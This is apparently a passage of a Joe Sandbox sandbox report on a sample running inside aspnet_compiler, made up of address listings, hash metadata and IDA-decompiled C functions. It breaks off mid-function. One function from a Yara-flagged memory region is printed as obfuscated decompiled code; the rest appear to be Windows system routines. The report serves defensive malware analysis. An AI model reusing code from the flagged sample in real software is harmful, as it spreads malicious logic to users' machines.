                                                  0x018bfbb8
                                                  0x018bfbbd
                                                  0x018bfbbd
                                                  0x018bfbbf
                                                  0x018bfbbf
                                                  0x018bfbc5
                                                  0x018bfbcb
                                                  0x018bfbf8
                                                  0x018bfbf8
                                                  0x018bfbfa
                                                  0x00000000
                                                  0x018bfc00
                                                  0x018bfc00
                                                  0x018bfc03
                                                  0x00000000
                                                  0x018bfc09
                                                  0x018bfc09
                                                  0x018bfc0f
                                                  0x018bfc15
                                                  0x018bfc23
                                                  0x018bfc23
                                                  0x018bfc25
                                                  0x018bfc27
                                                  0x018bfc75
                                                  0x018bfc7c
                                                  0x018bfc84
                                                  0x00000000
                                                  0x018bfc29
                                                  0x018bfc29
                                                  0x018bfc2d
                                                  0x018bfc30
                                                  0x018fbf0f
                                                  0x00000000
                                                  0x018bfc36
                                                  0x018bfc38
                                                  0x018bfc3b
                                                  0x018bfc41
                                                  0x018fbf17
                                                  0x018fbf19
                                                  0x018fbf48
                                                  0x018fbf4b
                                                  0x00000000
                                                  0x018fbf1b
                                                  0x018fbf22
                                                  0x018fbf24
                                                  0x018fbf26
                                                  0x00000000
                                                  0x018fbf2c
                                                  0x018fbf37
                                                  0x018fbf39
                                                  0x018fbf3b
                                                  0x00000000
                                                  0x018fbf41
                                                  0x018fbf41
                                                  0x018fbf41
                                                  0x018fbf41
                                                  0x018fbf45
                                                  0x00000000
                                                  0x018fbf45
                                                  0x018fbf3b
                                                  0x018fbf26
                                                  0x00000000
                                                  0x018bfc47
                                                  0x018bfc47
                                                  0x018bfc49
                                                  0x018bfcb2
                                                  0x018bfcb4
                                                  0x018bfcb6
                                                  0x018bfcdc
                                                  0x018bfcdc
                                                  0x00000000
                                                  0x018bfcb8
                                                  0x018bfcc3
                                                  0x018bfcc5
                                                  0x018bfcc7
                                                  0x00000000
                                                  0x018bfcc9
                                                  0x018bfcc9
                                                  0x018bfccd
                                                  0x00000000
                                                  0x018bfccd
                                                  0x018bfcc7
                                                  0x00000000
                                                  0x018bfc4b
                                                  0x018bfc4b
                                                  0x018bfc4e
                                                  0x018bfc4e
                                                  0x018bfc51
                                                  0x018bfc51
                                                  0x018bfc54
                                                  0x018bfc5a
                                                  0x018bfc5c
                                                  0x018bfc5f
                                                  0x018bfc61
                                                  0x018bfc63
                                                  0x018bfc65
                                                  0x018bfc67
                                                  0x018bfc6e
                                                  0x018bfc72
                                                  0x018bfc72
                                                  0x018bfc72
                                                  0x018bfc72
                                                  0x018bfc67
                                                  0x018bfc61
                                                  0x00000000
                                                  0x018bfc5a
                                                  0x018bfc49
                                                  0x018bfc41
                                                  0x018bfc30
                                                  0x018bfc27
                                                  0x018bfc03
                                                  0x018bfbcd
                                                  0x018bfbd3
                                                  0x018bfbd9
                                                  0x018bfbdc
                                                  0x018bfbde
                                                  0x018bfc99
                                                  0x018bfc9b
                                                  0x018bfc9d
                                                  0x018bfcd5
                                                  0x018bfcd5
                                                  0x018bfc89
                                                  0x018bfc89
                                                  0x00000000
                                                  0x018bfc9f
                                                  0x018bfc9f
                                                  0x018bfca3
                                                  0x00000000
                                                  0x018bfca3
                                                  0x00000000
                                                  0x018bfbe4
                                                  0x018bfbe4
                                                  0x018bfbe4
                                                  0x018bfbe4
                                                  0x018bfbe9
                                                  0x018bfbf2
                                                  0x00000000
                                                  0x018bfbf2
                                                  0x018bfbde
                                                  0x018bfbcb
                                                  0x018bfbab
                                                  0x018bfc8b
                                                  0x018bfc8b
                                                  0x018bfc8c
                                                  0x018bfb80
                                                  0x018bfb72
                                                  0x018bfb5e
                                                  0x018bfc8d
                                                  0x018bfc91
                                                  0x018bfadf
                                                  0x018bfadf
                                                  0x018bfae1
                                                  0x018bfae4
                                                  0x018bfae7
                                                  0x018bfaec
                                                  0x018bfaf8
                                                  0x018bfb00
                                                  0x018bfb07
                                                  0x018bfb0f
                                                  0x018bfb0f
                                                  0x018bfb07
                                                  0x00000000
                                                  0x018bfaf8
                                                  0x018bfadd

                                                  Strings
                                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 018FBE0F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                  • API String ID: 0-865735534
                                                  • Opcode ID: 3185ddf560cf407970a98bd363a5ec4c53a40495d3896d0ac9c8abea553d8f94
                                                  • Instruction ID: 64ad05005c4340bae80924d82f820fccd331e4570625efeb0d0c86df514d03d9
                                                  • Opcode Fuzzy Hash: 3185ddf560cf407970a98bd363a5ec4c53a40495d3896d0ac9c8abea553d8f94
                                                  • Instruction Fuzzy Hash: F0A1F371B00616CBEB25DF6CC8A0BBAB7A4AF48714F04456DEB06DB781DB34DA41CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041C09E Relevance: 1.5, Strings: 1, Instructions: 218COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 47%
                                                  			E0041C09E(void* __eax, signed int __edx) {
				intOrPtr _t34;
				signed char _t37;
				signed char _t38;
				signed int _t41;
				intOrPtr _t42;
				void* _t47;
				void* _t48;
				void* _t49;
				signed char _t54;
				char _t59;
				signed int _t61;
				signed int _t68;
				intOrPtr _t75;
				signed int _t93;
				signed int _t94;

				_t61 = __edx;
				 *0x5d3c4862 =  *0x5d3c4862 >> 0xf9;
				_t94 =  *0x715f4edc;
				 *0x715f4edc = _t93;
				_pop(_t68);
				 *0xc2cfeaf5 =  *0xc2cfeaf5 ^ 0x540e5b8c;
				_t54 = 0xf9;
				 *0xbb5e3d7 =  *0xbb5e3d7 >> 0x5d;
				_pop(_t75);
				 *0xa04bb363 =  *0xa04bb363 << 0x70;
				asm("sbb [0xe982c083], ebx");
				_t41 =  *0xf719766a * 0x2a62;
				_push(_t41);
				if(_t41 < 0) {
					__edi =  *0x937b7379;
					asm("adc bl, [0x40ccfa84]");
					_push(__ebp);
					__esi = __esi |  *0xda17f1dc;
					__ebx =  *0xc1f42b6b * 0x6729;
					if(__edi == 0xf973d2ea) {
						asm("adc [0x7c2b1b7b], esp");
						 *0x3319785 =  *0x3319785 >> 0xc4;
						asm("lodsb");
						 *0xd30291c5 =  *0xd30291c5 ^ __ebp;
						 *0x4da5f73a =  *0x4da5f73a - __ah;
						_t24 = __ebx;
						__ebx =  *0xd1d09985;
						 *0xd1d09985 = _t24;
						asm("sbb edx, [0x39c92bf5]");
						 *0xf90eec36 = __edi;
						if( *0x4da5f73a <= 0) {
							__edi =  *0x4208307f * 0x663b;
							asm("sbb [0x5d466dce], esp");
							 *0xc9000ff5 =  *0xc9000ff5 >> 0x41;
							asm("sbb [0x79672a38], al");
							 *0xc850d6b8 =  *0xc850d6b8 << 0x34;
							__bh = __bh & 0x0000003a;
							asm("sbb eax, 0x627b2166");
							_t25 = __edx;
							__edx =  *0xb645910f;
							 *0xb645910f = _t25;
							__ebp = 0x6ce6951e;
							 *0x3ac82e95 =  *0x3ac82e95 - __eax;
							__ebx = __ebx +  *0x627b2166;
							asm("ror dword [0x50eae509], 0x32");
							__edx =  *0xb645910f + 1;
							_t26 = __dl;
							__dl =  *0x4a30b51c;
							 *0x4a30b51c = _t26;
							__edi = 0x4ee53b0d;
							if( *0xb645910f + 1 > 0) {
								goto L1;
							} else {
								__esi =  *0x1c083f7f * 0x813f;
								 *0xd6cdcc1b =  *0xd6cdcc1b << 0x52;
								__ebx = __ebx + 1;
								__esp = __esp - 0x14f74fce;
								_push( *0x92e103dd);
								__bl = __bl &  *0xa71e51b6;
								__eax =  *0x8cf83cce;
								__edi = 0x4ee53b0e;
								 *0xe9126364 =  *0xe9126364 >> 0x8b;
								__edi = 0x4ee53b0e &  *0x8f2a0805;
								return  *0x8cf83cce;
							}
						}
					}
				}
				L1:
				_t34 =  *0x8a5b6f09;
				 *0xe2fbac3a =  *0xe2fbac3a << 0xd4;
				 *0xd80d5962 =  *0xd80d5962 >> 0x94;
				_t75 = _t75 +  *0xd42ffed1;
				asm("rol dword [0x49f30da1], 0xe6");
				_t94 = _t94 |  *0xcd6b907;
				asm("adc [0x27be62cc], ecx");
				_t42 =  *0x4c6af8e6;
				asm("rcl byte [0x61261908], 0xa0");
				asm("ror dword [0xef2805f5], 0x5e");
				L1();
				_t2 = _t68 | 0x3070619a;
				_t68 =  *0xd9fa7c9c;
				 *0xd9fa7c9c = _t2;
				asm("rcr byte [0x731c7df2], 0x27");
				if(_t34 > 0xd9c1ae8) {
					asm("adc edi, 0xfd9e09bb");
					asm("adc esi, [0x373123f3]");
					 *0xf3b326f4 =  *0xf3b326f4 << 0x43;
					_push(_t54 - 0x24c955fa ^  *0xad1f370d | 0x000000c9);
					 *0x8b9fc10a =  *0x8b9fc10a ^ _t61;
					 *0x89c3023b =  *0x89c3023b >> 0x5b;
					_pop(_t59);
					 *0x6afee6c2 =  *0x6afee6c2 << 0x8d;
					 *0xe6c91d8a =  *0xe6c91d8a | _t42 - 0x00000001 | 0x00000014;
					 *0x626bb1bd = _t61 +  *0x38460a9c;
					asm("adc al, 0x12");
					asm("ror dword [0xcaffddc7], 0x5c");
					_t94 = 0xa99f0094;
					 *0xe8df222b =  *0x9033af85;
					asm("adc dh, 0x12");
					_t37 =  *0x93002a0c;
					 *0x93002a0c = _t34 + 0x0000000a & 0x000000f9;
					asm("adc ch, 0xe3");
					 *0xc3c651b4 = _t59;
					asm("rcl dword [0x300e6fed], 0x51");
					_t68 = (_t68 +  *0xa5c54f2f - 0x00000001 |  *0x160f6aff) + 1;
					 *0xa0e5fbd6 =  *0xa0e5fbd6 >> 0x77;
					 *0x5f260af2 =  *0x5f260af2 >> 0xe3;
					_pop(_t47);
					_t54 = _t59 -  *0xd05ea5f4;
					 *0xf17fe60b =  *0xf17fe60b >> 0x94;
					asm("stosb");
					asm("adc [0xe66c437], eax");
					asm("sbb [0xc5e55ecc], eax");
					asm("sbb al, [0xba4179e2]");
					 *0xc5f4d7be =  *0xc5f4d7be >> 0xf0;
					_t48 = _t47 + 1;
					 *0xc40009f9 =  *0xc40009f9 + _t37;
					asm("ror dword [0xbb39d8a1], 0xcd");
					_t75 =  *0x84bf4e25;
					asm("scasb");
					_t61 = 0xa0 -  *0x3c55651d ^  *0xb6825ee4;
					if(0xa2 == 0) {
						asm("adc [0xb2faa87a], edi");
						_t61 = _t61 &  *0xbe1ee96d;
						 *0x3498282b =  *0x3498282b >> 0x49;
						_push(0xa5ed0368);
						_t54 = (_t54 ^  *0x8689a4e7) & 0x00000080;
						if( *0xe01eda6a * 0xad24 == 0) {
							 *0x7668bbfe =  *0x7668bbfe - _t54;
							_t38 = _t37 |  *0x1b953786;
							 *0x3412f934 =  *0x3412f934 << 0x2f;
							L1();
							 *0xe382fce6 =  *0xe382fce6 >> 0xb;
							 *0xb5082a30 =  *0xb5082a30 << 0xf0;
							asm("scasd");
							asm("sbb eax, 0x2958af36");
							 *0x931ecd94 =  *0x931ecd94 + _t94;
							_t49 = _t48 + 0xb4;
							asm("sbb [0x356c71a], dh");
							_t75 = _t75 + 1;
							_t54 = _t94;
							asm("adc eax, [0x9778e5f4]");
							 *0xaa6bb40b =  *0xaa6bb40b - _t49;
							asm("sbb [0x510b800e], ecx");
							asm("lodsd");
							_t61 = _t61 &  *0xb9c4fe8 ^  *0x6a3db73d;
							asm("ror byte [0x84306604], 0x3d");
							_t94 = _t94 + 1;
							 *0x12d55c86 =  *0x12d55c86 + _t49 -  *0xdb6f22f2;
							 *0x70491025 =  *0x70491025 << 0xa4;
							 *0xe1446d28 =  *0xe1446d28 << 0xd1;
							if( *0xe1446d28 < 0) {
								 *0x9033ac79 = _t38;
								_t54 = _t54 + 0x12;
							}
						}
					}
				}
				goto L1;
			}


















                                                  0x0041c09e
                                                  0x0041c0b1
                                                  0x0041c0b8
                                                  0x0041c0b8
                                                  0x0041c0cc
                                                  0x0041c0cd
                                                  0x0041c0d3
                                                  0x0041c0e7
                                                  0x0041c0f4
                                                  0x0041c0fe
                                                  0x0041c105
                                                  0x0041c10d
                                                  0x0041c117
                                                  0x0041c118
                                                  0x0041c11e
                                                  0x0041c124
                                                  0x0041c130
                                                  0x0041c131
                                                  0x0041c137
                                                  0x0041c147
                                                  0x0041c14d
                                                  0x0041c159
                                                  0x0041c160
                                                  0x0041c161
                                                  0x0041c167
                                                  0x0041c16e
                                                  0x0041c16e
                                                  0x0041c16e
                                                  0x0041c174
                                                  0x0041c17a
                                                  0x0041c180
                                                  0x0041c186
                                                  0x0041c190
                                                  0x0041c196
                                                  0x0041c19d
                                                  0x0041c1a3
                                                  0x0041c1aa
                                                  0x0041c1ad
                                                  0x0041c1b2
                                                  0x0041c1b2
                                                  0x0041c1b2
                                                  0x0041c1b8
                                                  0x0041c1be
                                                  0x0041c1c4
                                                  0x0041c1ca
                                                  0x0041c1d1
                                                  0x0041c1d2
                                                  0x0041c1d2
                                                  0x0041c1d2
                                                  0x0041c1d9
                                                  0x0041c1de
                                                  0x00000000
                                                  0x0041c1e4
                                                  0x0041c1e4
                                                  0x0041c1ee
                                                  0x0041c1fb
                                                  0x0041c1fc
                                                  0x0041c208
                                                  0x0041c20e
                                                  0x0041c21a
                                                  0x0041c21f
                                                  0x0041c220
                                                  0x0041c227
                                                  0x0041c22d
                                                  0x0041c22d
                                                  0x0041c1de
                                                  0x0041c180
                                                  0x0041c147
                                                  0x0041b8c6
                                                  0x0041b8c6
                                                  0x0041b8cb
                                                  0x0041b8d2
                                                  0x0041b8d9
                                                  0x0041b8e0
                                                  0x0041b8e7
                                                  0x0041b8f3
                                                  0x0041b8f9
                                                  0x0041b8ff
                                                  0x0041b90c
                                                  0x0041b913
                                                  0x0041b91d
                                                  0x0041b91d
                                                  0x0041b91d
                                                  0x0041b923
                                                  0x0041b92a
                                                  0x0041b93e
                                                  0x0041b944
                                                  0x0041b962
                                                  0x0041b96c
                                                  0x0041b96d
                                                  0x0041b985
                                                  0x0041b98c
                                                  0x0041b9a1
                                                  0x0041b9b1
                                                  0x0041b9cd
                                                  0x0041b9d3
                                                  0x0041b9de
                                                  0x0041b9e5
                                                  0x0041b9f2
                                                  0x0041b9f8
                                                  0x0041ba01
                                                  0x0041ba01
                                                  0x0041ba07
                                                  0x0041ba10
                                                  0x0041ba1e
                                                  0x0041ba25
                                                  0x0041ba26
                                                  0x0041ba37
                                                  0x0041ba4d
                                                  0x0041ba4e
                                                  0x0041ba5f
                                                  0x0041ba66
                                                  0x0041ba67
                                                  0x0041ba6d
                                                  0x0041ba73
                                                  0x0041ba79
                                                  0x0041ba80
                                                  0x0041ba81
                                                  0x0041ba87
                                                  0x0041ba8e
                                                  0x0041ba9a
                                                  0x0041ba9b
                                                  0x0041baa1
                                                  0x0041baa7
                                                  0x0041baad
                                                  0x0041bab3
                                                  0x0041baba
                                                  0x0041bac5
                                                  0x0041bad2
                                                  0x0041bade
                                                  0x0041bae4
                                                  0x0041baea
                                                  0x0041baf1
                                                  0x0041bafc
                                                  0x0041bb03
                                                  0x0041bb0a
                                                  0x0041bb0c
                                                  0x0041bb11
                                                  0x0041bb17
                                                  0x0041bb1f
                                                  0x0041bb25
                                                  0x0041bb26
                                                  0x0041bb33
                                                  0x0041bb39
                                                  0x0041bb4b
                                                  0x0041bb51
                                                  0x0041bb52
                                                  0x0041bb58
                                                  0x0041bb5f
                                                  0x0041bb72
                                                  0x0041bb7e
                                                  0x0041bb87
                                                  0x0041bb8e
                                                  0x0041bb94
                                                  0x0041bb9a
                                                  0x0041bb9d
                                                  0x0041bb8e
                                                  0x0041bad2
                                                  0x0041baa1
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ;N
                                                  • API String ID: 0-1539076043
                                                  • Opcode ID: 1b41f27c1fdc9242dc9d681084a939713aaf19ee4c51ed6b7ec0ca244305a76c
                                                  • Instruction ID: 7f586a578be067d5f85d4b18ceedc61a34f00f199c673a45d1adb6997da686a4
                                                  • Opcode Fuzzy Hash: 1b41f27c1fdc9242dc9d681084a939713aaf19ee4c51ed6b7ec0ca244305a76c
                                                  • Instruction Fuzzy Hash: 2DB17572919385CFD716DF38D88AB813FB5F756320B08429EC9A1975E6D334244ACF89
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01882D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E01882D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1975350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1977bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					L018C97C0();
				}
				if( *0x19779c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x19779c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						L018B1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(L018A7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							L0191FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E018C9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E018BE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L018DDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1976901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1976901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E018C9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E018C95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = L018A7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = L018A7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01907016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0191FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1975350;
							if(_t109 != 0x1975350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									L0191FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						L01915720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                  0x01882d8a
                                                  0x01882d8a
                                                  0x01882d92
                                                  0x01882d96
                                                  0x01882d9e
                                                  0x01882da0
                                                  0x01882da3
                                                  0x01882da5
                                                  0x01882da8
                                                  0x01882dab
                                                  0x01882db2
                                                  0x018df9aa
                                                  0x018df9ab
                                                  0x018df9ae
                                                  0x018df9ae
                                                  0x01882db8
                                                  0x01882dc2
                                                  0x018df9b9
                                                  0x018df9be
                                                  0x018df9bf
                                                  0x018df9bf
                                                  0x01882dcf
                                                  0x018df9c9
                                                  0x01882dd5
                                                  0x01882dd5
                                                  0x01882dd5
                                                  0x01882dde
                                                  0x01882de1
                                                  0x01882e70
                                                  0x01882e72
                                                  0x01882e72
                                                  0x01882de7
                                                  0x01882deb
                                                  0x01882e7c
                                                  0x01882e83
                                                  0x01882e85
                                                  0x01882e8b
                                                  0x01882e8d
                                                  0x01882e92
                                                  0x01882e92
                                                  0x01882e85
                                                  0x01882df1
                                                  0x01882df7
                                                  0x01882df9
                                                  0x01882df9
                                                  0x01882dfc
                                                  0x01882dff
                                                  0x01882e02
                                                  0x00000000
                                                  0x01882e05
                                                  0x01882e0c
                                                  0x018df9d9
                                                  0x01882e12
                                                  0x01882e12
                                                  0x01882e12
                                                  0x01882e1a
                                                  0x018df9e3
                                                  0x018df9e9
                                                  0x018df9f0
                                                  0x018df9f6
                                                  0x018df9f8
                                                  0x018df9f8
                                                  0x018df9f0
                                                  0x01882e23
                                                  0x018dfa02
                                                  0x018dfa03
                                                  0x018dfa05
                                                  0x018dfa06
                                                  0x00000000
                                                  0x01882e29
                                                  0x01882e29
                                                  0x01882e2e
                                                  0x01882e34
                                                  0x01882e3e
                                                  0x00000000
                                                  0x00000000
                                                  0x01882e44
                                                  0x01882e47
                                                  0x01882e4d
                                                  0x00000000
                                                  0x00000000
                                                  0x01882e4f
                                                  0x01882e54
                                                  0x00000000
                                                  0x00000000
                                                  0x01882e5a
                                                  0x01882e5f
                                                  0x01882e9a
                                                  0x01882ea4
                                                  0x01882ea5
                                                  0x01882ea8
                                                  0x01882eaf
                                                  0x01882eb2
                                                  0x01882eb5
                                                  0x018dfae9
                                                  0x018dfaeb
                                                  0x018dfaed
                                                  0x018dfaef
                                                  0x018dfaf7
                                                  0x018dfaf8
                                                  0x018dfafd
                                                  0x018dfaff
                                                  0x018dfb04
                                                  0x018dfb04
                                                  0x018dfaff
                                                  0x01882ec0
                                                  0x01882ec4
                                                  0x01882ec6
                                                  0x01882ec8
                                                  0x018dfb14
                                                  0x018dfb18
                                                  0x018dfb1e
                                                  0x018dfb21
                                                  0x018dfb21
                                                  0x01882ece
                                                  0x01882ece
                                                  0x01882ece
                                                  0x01882ed7
                                                  0x01882e61
                                                  0x01882e63
                                                  0x018dfa6b
                                                  0x018dfa71
                                                  0x018dfa76
                                                  0x018dfa78
                                                  0x018dfa8a
                                                  0x018dfa7a
                                                  0x018dfa83
                                                  0x018dfa83
                                                  0x018dfa8f
                                                  0x018dfa91
                                                  0x018dfa97
                                                  0x018dfa9d
                                                  0x018dfaa4
                                                  0x018dfaaa
                                                  0x018dfaaf
                                                  0x018dfab1
                                                  0x018dfac3
                                                  0x018dfab3
                                                  0x018dfabc
                                                  0x018dfabc
                                                  0x018dfac8
                                                  0x018dfacb
                                                  0x018dfadf
                                                  0x018dfadf
                                                  0x018dfacb
                                                  0x018dfaa4
                                                  0x018dfa91
                                                  0x01882e6f
                                                  0x01882e6f
                                                  0x01882e5f
                                                  0x018dfa13
                                                  0x018dfa15
                                                  0x018dfa17
                                                  0x018dfa1f
                                                  0x018dfa21
                                                  0x018dfa22
                                                  0x018dfa25
                                                  0x018dfa28
                                                  0x018dfa2f
                                                  0x018dfa2f
                                                  0x018dfa2a
                                                  0x018dfa2a
                                                  0x018dfa2a
                                                  0x018dfa31
                                                  0x018dfa34
                                                  0x018dfa36
                                                  0x018dfa3c
                                                  0x018dfa3e
                                                  0x018dfa41
                                                  0x018dfa43
                                                  0x018dfa45
                                                  0x018dfa45
                                                  0x018dfa41
                                                  0x018dfa3c
                                                  0x018dfa4a
                                                  0x018dfa4f
                                                  0x018dfa51
                                                  0x018dfa53
                                                  0x018dfa56
                                                  0x018dfa5b
                                                  0x018dfa5e
                                                  0x00000000
                                                  0x018dfa5e
                                                  0x01882e23

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Re-Waiting
                                                  • API String ID: 0-316354757
                                                  • Opcode ID: 65c6dbd7c84b50be3a3282cfce146f7636eb50b94d1a73f0f0c30c879f3fb022
                                                  • Instruction ID: 2e431ab557b582ce16977310ac8c6f5deba4101cbd66c253df8b8d4f6edcf420
                                                  • Opcode Fuzzy Hash: 65c6dbd7c84b50be3a3282cfce146f7636eb50b94d1a73f0f0c30c879f3fb022
                                                  • Instruction Fuzzy Hash: 05610831A00749AFEB22EF6CC844B7E7BA6EF44718F144255E616D72C2C7349B41D792
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018BF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 75%
                                                  			E018BF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E018A4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E018C9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E018C9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E018C95D0();
							goto L11;
						} else {
							_t109 = L018A4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E018CF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
